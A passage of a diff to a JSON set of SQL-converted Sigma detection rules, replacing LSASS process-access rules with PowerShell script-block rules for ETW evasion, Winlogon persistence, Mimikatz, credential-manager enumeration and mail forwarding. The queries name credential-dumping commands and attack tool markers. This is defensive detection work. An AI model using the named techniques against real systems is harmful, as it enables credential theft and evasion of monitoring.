Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Winlogon Helper DLL", + "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "status": "experimental", + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_winlogon_helper_dll.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "title": "Service Registry Permissions Weakness Check", + "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_get_acl_service.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1003" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "title": "Suspicious Hyper-V Cmdlets", + "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.defense_evasion", + "attack.t1564.006" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_hyper_v_condlet.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" - ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" - }, - { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ], - "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", + "id": "603c6630-5225-49c1-8047-26c964553e0e", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" }, { - "title": "Rare GrantedAccess Flags on LSASS Access", - "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", + "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate usage of the cmdlet to forward emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" ], - "filename": "proc_access_win_rare_proc_access_lsass.yml" + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", - "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", + "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "status": "test", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.credential_access", - 